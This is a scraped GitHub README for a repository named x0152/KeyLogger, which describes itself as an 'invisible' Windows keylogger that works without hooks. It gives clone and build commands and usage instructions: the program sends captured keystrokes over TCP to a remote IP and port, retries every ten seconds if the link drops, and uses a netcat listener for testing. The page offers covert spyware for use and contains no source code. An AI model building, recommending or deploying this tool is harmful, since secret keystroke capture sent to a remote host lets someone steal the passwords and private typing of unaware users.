x0152 / KeyLogger

keylogger without hooks

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Invisible keyLogger for Windows (without windows hooks)

Build

git clone https://github.com/x0152/KeyLogger
cd KeyLogger
mkdir build
cd build
cmake .. -G "MinGW Makefiles"
make

Usage

KeyLogger <ip> <port>

Program will establish tcp connection to ip on specified port. You can use netcat for testing. (example: nc -l 8030) If the connection is lost then programm will try reconnect each 10 seconds.

Exapmple output

About

keylogger without hooks


Languages

Language:C++ 98.0%Language:CMake 2.0%